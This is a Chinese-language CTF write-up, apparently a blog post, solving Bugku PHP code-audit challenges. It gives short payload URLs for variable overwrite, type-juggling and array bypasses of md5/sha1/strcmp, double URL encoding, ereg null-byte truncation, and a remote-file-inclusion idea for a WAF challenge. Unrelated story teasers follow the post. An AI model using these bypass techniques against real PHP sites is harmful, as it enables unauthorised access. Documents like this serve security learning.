Bugku 代码审计

extract变量覆盖

我们看到extract函数没有设置extract_rules,而extract默认的规则是如果有冲突则覆盖掉已有的变量,因此我们可以构造  120.24.86.145:9009/1.php?shiyan=&flag=

还有另一种方法

看到file_get_contents函数,我们可以通过php://input为其赋值

strcmp比较字符串

strcmp是比较字符串的函数,构造数组即可绕过

payload:120.24.86.145:9009/6.php?a[]=1

urldecode二次编码绕过

解读源码

1、id不等于hackerDJ

2、传入的id url解码后等于hackerDJ

因为浏览器自身会对id解码一次,所以我们只要传入两次url编码后的hackerDJ即可

payload:120.24.86.145:9009/10.php?id=hacker%2544J

md5()函数

解读源码:

1、username不等于password

2、md5(username) === md5(password)

因此0e开头的字符串不能绕过了,但是我们可以构造数组绕过

payload:120.24.86.145:9009/18.php?username[]=a&password[]=b

数组返回NULL绕过

ereg、strops是处理字符串的函数,在处理数组时会返回null,即可绕过

payload: 120.24.86.145:9009/19.php?password[]=

弱类型整数大小比较绕过

is_numeric是检测数字及数字字符串的,因此我们只需要在我们传进去的数字后面加入非数字字符即可绕过

payload: 120.24.86.145:9009/22.php?password=1377a

sha()函数比较绕过

解读源码:

1、name不等于password

2、他们的sha1值相等

sha1不能处理数组,因此构造数组即可绕过

payload: 120.24.86.145:9009/7.php?name[]=1&password[]=2

md5加密相等绕过

常见的md5比较漏洞,就不多说了

payload: 120.24.86.145:9009/13.php?a=s878926199a

十六进制与数字比较

ord()返回字符串首字母的ascii值,结合题目,传入3735929054的十六进制即可getflag

payload: http://120.24.86.145:9009/20.php?password=0xdeadc0de

变量覆盖

这题和第一题一模一样的,就不多说了,两种方法任选一种都可以

ereg正则%00截断

ereg存在%00漏洞,因此这里可以用%00绕过,而passowrd长的要小于8但是数值又要大于9999999,因此可以用科学计数法绕过

payload:http://120.24.86.145:9009/5.php?password=9e8%00*-*

strpos数组绕过

利用ereg和strops处理数组时的漏洞

payload: 120.24.86.145:9009/15.php?ctf[]=1

数字验证正则绕过

preg_match('/^[[:graph:]]{12,}$/', $password) 即匹配password中除空格和tab键之外的字符12次以上,那如果我们传进去的password长度小于12或者是数组的话,preg_match 返回的就是0,就能输出flag

简单的waf

要求传入abcde,a中不能包含php,因此a不能用php://input来为其赋值了,但是可以通过远程文件包含来为其赋值,即在自己的服务器上写一个txt文件,e可以用php://input来赋值,然后就会看到返回hello admin

但是c和d不知道有什么作用,看到c中不能包含flag,d不能包含base64,于是猜测题目可能存在flag.php之类的,需要通过d去读取?尝试访问flag.php看到flag on my head,访问flag,发现会下载一个文件,里面说Please call admin to get flag,令c=flag.php会触发他的waf,但是令c=Flag.php可以绕过,但是也没有返回其他的东西,摇头.gif不知道怎么操作了,希望有大佬会的话带带我Orz

作者水平有限,若有错误请指出Orz

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,098评论 5 476
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,213评论 2 380
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 149,960评论 0 336
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,519评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,512评论 5 364
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,533评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,914评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,574评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,804评论 1 296
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,563评论 2 319
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,644评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,350评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,933评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,908评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,146评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,847评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,361评论 2 342

推荐阅读更多精彩内容

  • 新银报到,多多指教,如有错误,多谢指出 extract变量覆盖 第一次遇到extract()函数,百度一波含义(回...
    yangc随想阅读 4,228评论 5 2
  • md5()函数 得到flag的条件是变量username和password不等,但是其经过md5加密后相等。若经过...
    Hf1dw阅读 2,125评论 0 0
  • 1.extract变量覆盖 2.strcmp比较字符串 strcmp()用法参考: 函数期望传入的类型是字符串类...
    心飞丶阅读 593评论 0 0
  • 我使用的是火狐浏览器 使用火狐浏览器的hackbar插件 如果有错误的地方希望大家多多指出,多谢多谢 WEB2 点...
    yangc随想阅读 54,228评论 11 16
  • WEB2 看源代码得flag 文件上传测试 找一张图片上传,截包改后缀名为.php得flag 计算题 F12修改输...
    a2dd56f6ad89阅读 18,490评论 0 2